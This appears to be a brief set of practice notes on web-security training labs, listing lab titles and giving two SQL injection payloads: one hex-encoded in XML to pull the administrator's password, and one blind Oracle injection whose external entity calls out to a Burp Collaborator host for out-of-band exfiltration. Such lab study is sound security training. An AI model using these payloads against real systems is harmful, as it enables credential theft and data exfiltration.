recommended_labs
[0x1] Lab: SQL injection with filter bypass via XML encoding
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
<productId>
2
</productId>
<storeId>
<@hex_entities>
1 union select password from users where username='administrator'
<@/hex_entities>
</storeId>
</stockCheck>[0x2] Lab: Blind SQL injection with out-of-band data exfiltration
Identify vulnerability:
aaxaxa'UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://x.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual-- Data exfiltration
[0x3] Lab: Exploiting cross-site scripting to steal cookies
[0x4] Lab: SSRF with blacklist-based input filter
[0x5] Lab: Exploiting HTTP request smuggling to capture other users' requests
[0x6] Lab: Brute-forcing a stay-logged-in cookie
[0x7] Email Reset User Takeover
[0x8] onpopstate event XSS cookie retrieve
Last updated
